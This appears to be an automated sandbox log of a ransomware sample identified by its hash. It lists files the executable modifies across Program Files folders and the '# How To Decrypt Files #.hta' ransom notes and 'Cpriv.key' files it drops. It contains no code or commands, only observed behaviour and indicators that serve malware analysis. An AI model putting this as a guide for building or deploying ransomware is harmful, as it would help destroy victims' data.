de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Seyes.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Essential.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0305257.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\COUPLER.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\Hierarchy.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00098_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01658_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151055.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\APPTS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENVELOPE.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-core-kit.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00799_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00197_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\CollectSignatures_Init.xsn de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\chrome_100_percent.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\REPORTS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosecolor.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot_lrg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0216588.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\MEDIA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\QUAD\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099176.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01354_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115835.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\RECL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\viewSelectionChanged.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BZCRD98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\INVITE11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153508.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CRANINST.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01329_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\CURRENCY.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\HostSideAdapters\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\AFTRNOON\AFTRNOON.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Waveform.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Graph.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VGX\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02116_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\CONVERT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10299_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15056_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\browser\features\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1041\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00792_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBCALSO.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Document Themes 14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0212957.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21495_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCOUPON.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00364_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0281904.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR28F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\macroprogress.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Excel.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\ContactSelector.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RIPPLE\RIPPLE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\OOFL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OutSyncPC.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1042\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02444_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02124_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_rgb6.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\Contracts\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01299_.GIF 